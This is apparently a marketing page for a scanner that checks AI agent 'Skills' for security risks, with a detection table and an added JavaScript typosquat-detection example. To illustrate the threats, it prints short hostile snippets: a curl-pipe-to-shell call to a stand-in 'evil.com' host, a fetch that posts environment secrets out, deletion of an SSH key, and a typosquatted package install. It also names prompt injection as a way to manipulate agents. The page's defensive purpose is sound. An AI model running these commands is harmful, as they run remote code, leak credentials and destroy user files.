Is this Skill safe?
Scan any Moltbot Skill for security risks before you install it. Detect shell injection, data exfiltration, and hidden threats.
AI Agent Skills Are a New Attack Vector
Third-party skills execute with your agent's permissions. Without scanning, you're blindly trusting unknown code.
Remote Code Execution
Malicious skills use exec(), eval(), or new Function() to run arbitrary commands.
exec('curl evil.com | sh')
File System Attacks
Skills can read, overwrite, or delete files—including SSH keys and credentials.
fs.unlinkSync('~/.ssh/id_rsa')
Data Exfiltration
Network-enabled skills can silently POST API keys and secrets to external servers.
fetch(evil, {body: process.env})
Dependency Attacks
Typosquatting and compromised packages introduce hidden vulnerabilities.
npm install lodahs
Interactive Security Scanner
Paste code or load a preset to see MoltCheck in action.
What MoltCheck Detects
Three detection engines working together: AST analysis, regex patterns, and dependency scanning.
| Severity | Pattern | Risk |
|---|---|---|
| critical | exec(), spawn(), eval() | Arbitrary code execution |
| critical | Typosquatted packages | Supply chain attack |
| critical | Prompt injection | Agent manipulation |
| high | fs.writeFile, fs.unlink | File tampering/deletion |
| high | String construction evasion | Hidden malicious code |
| medium | fetch(), axios, http.request | Data exfiltration |
| medium | Time bomb patterns | Delayed activation |
| low | process.env access | Environment exposure |
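The "Typosquatted packages" row can be approximated with an edit-distance comparison between a skill's declared dependencies and known package names; lodahs, for instance, is one adjacent transposition away from lodash. The following is an added example, not MoltCheck's code: the POPULAR list, the sample manifest and the function names are constructed for illustration.

```javascript
// Added example: flag dependency names that sit within a small edit distance
// of a well-known package without matching it exactly.
// POPULAR is a constructed sample list, not a real registry ranking.
const POPULAR = ['lodash', 'express', 'axios', 'react', 'request', 'chalk'];

// Optimal string alignment distance: insert, delete, substitute, and
// adjacent transposition each cost 1 (so "lodahs" -> "lodash" is 1).
function osaDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0)));
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Returns findings for every declared dependency that looks like a near miss.
function findTyposquats(manifest, known = POPULAR, maxDistance = 1) {
  const declared = Object.keys({
    ...(manifest.dependencies || {}),
    ...(manifest.devDependencies || {}),
  });
  const findings = [];
  for (const name of declared) {
    const bare = name.toLowerCase().replace(/[-_.]/g, ''); // "ax-ios" style variants
    if (known.includes(name)) continue; // exact match is the real package
    for (const target of known) {
      const dist = osaDistance(bare, target);
      if (dist <= maxDistance) {
        findings.push({ name, resembles: target, distance: dist, severity: 'critical' });
        break;
      }
    }
  }
  return findings;
}

// Constructed sample manifest for a hypothetical skill.
const sampleManifest = {
  dependencies: { lodahs: '^4.17.21', express: '^4.18.2', 'ax-ios': '^1.6.0' },
  devDependencies: { chalk: '^5.3.0' },
};
console.log(findTyposquats(sampleManifest));
```

A distance threshold alone will also flag legitimate packages whose names happen to be close to a popular one, so a real check needs an allowlist of verified near neighbours.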
Ready to secure your agent?
Start scanning skills for free. Upgrade for API access and batch scanning.
